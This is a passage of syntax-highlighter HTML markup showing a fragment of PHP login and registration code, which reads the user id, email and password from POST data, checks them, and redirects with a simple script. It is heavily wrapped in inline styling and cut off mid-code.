id=&quot;crayon-5c677473e1a5a263262138-45&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;exit&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;&amp;lt;script&amp;gt;location.href='./';&amp;lt;/script&amp;gt;&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-46&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-47&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;else&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;login fail&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-48&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-49&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;elseif&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$page&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;==&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;join_chk&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-50&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$uid&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$_POST&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'uid'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-51&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$umail&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$_POST&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'umail'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-52&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$upw&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$_POST&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'upw'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-53&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$uid&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;amp;&amp;amp;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$upw&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;amp;&amp;amp;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$umail&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-54&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;strlen&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$uid&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;3&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: 